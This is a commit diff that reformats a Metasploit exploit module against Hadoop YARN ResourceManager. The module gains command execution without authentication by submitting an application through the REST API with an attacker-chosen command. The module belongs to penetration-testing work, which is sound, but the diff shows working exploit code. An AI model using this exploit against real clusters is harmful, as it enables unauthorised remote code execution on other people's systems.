Update mismatch indentation and others

2018-07-01 22:43:07 -04:00 · 2018-07-01 22:43:07 -04:00 · c3b71d4642
parent 492be19aa0
commit c3b71d4642
1 changed files with 10 additions and 12 deletions
--- a/modules/exploits/linux/http/hadoop_unauth_exec.rb
+++ b/modules/exploits/linux/http/hadoop_unauth_exec.rb
@ -9,11 +9,11 @@ class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

-  def initialize(info={})
+  def initialize(info = {})
    super(update_info(info,
-      'Name'           => 'Hadoop YARN ResourceManager Unauthorized Command Execution',
+      'Name'           => 'Hadoop YARN ResourceManager Unauthenticated Command Execution',
      'Description'    => %q{
-          This module exploits an unauthorized command execution vulnerability in Apache Hadoop through ResourceManager REST API.
+          This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
@ -38,16 +38,14 @@ class MetasploitModule < Msf::Exploit::Remote
      'DefaultTarget'  => 0
      ))

-    register_options([
-      Opt::RPORT(8088)
-    ])
+    register_options([Opt::RPORT(8088)])
  end


  def check
    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
-      'method'        => 'POST'
+      'uri'         => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
+      'method'      => 'POST'
    )

    unless res
@ -69,8 +67,8 @@ class MetasploitModule < Msf::Exploit::Remote

  def execute_command(cmd, opts = {})
    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
-      'method'        => 'POST'
+      'uri'         => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
+      'method'      => 'POST'
    )

    app_id = res.get_json_document['application-id']
@ -80,12 +78,12 @@ class MetasploitModule < Msf::Exploit::Remote
      'application-name'    => Rex::Text.rand_text_alpha_lower(4..12),
      'application-type'    => 'YARN',
      'am-container-spec'   => {
-          'commands' => {'command' => "#{cmd}"},
+          'commands' => {'command' => cmd.to_s},
      }
    }

    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
+      'uri'               => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
      'method'            => 'POST',
      'ctype'             => 'application/json',
      'data'              => post.to_json